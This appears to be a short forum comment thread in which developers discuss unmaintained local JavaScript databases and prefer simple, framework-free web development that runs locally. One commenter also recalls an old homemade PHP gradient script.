pdyc
27 days ago
[-]
lokijs and nedb were better candidates for local db's but sadly both are unmaintained.
reply
computerthings
27 days ago
[-]
I never made anything fancy, but I never made anything for the web that I can't run locally. If I can't just sync the changed files to the web server and overwrite the DB (which for my use cases takes seconds), I'm not interested. If it needs to be in the domain root, I'm not interested. A bunch of files using relative paths and a config that checks for running on localhost and points to the local DB or the production one, respectively. That's it (okay plus the domain and a few other things so cookies etc. work, but describing it would take longer than making it), that's all I want out of the web kthxbai. I'm basically stuck in 2000 and I love it.
reply
zwnow
27 days ago
[-]
Nah I feel like this is the right approach. Apps got too complicated to maintain safely. Web development should be accessible and have good standards. It should be easier to build webapps over the years but its becoming harder and harder.
reply
computerthings
27 days ago
[-]
I say it's easier today, if you keep it simple. Everything I did 20 years go still works, or works better, or became simpler to do, or is now built into the browser or the language or what have you.

Like this little PHP script I had to spit out custom gradients before CSS had them, it's weird how fondly I remember that... it wasn't even special or complicated, but it was my grd.php and I used it everywhere :) And on some old pages I never got around to replacing it, I'm sure! Once it works, it just works.

Stay away from frameworks and pre-processors, but also study them (!) and make your own and you'll be fine (that is, you will have a lot less pointless churn). If in doubt, don't put sensitive info on it and don't allow visitors to. There is so much you can do where security really literally doesn't matter, because it's just something cool to make and show people.

reply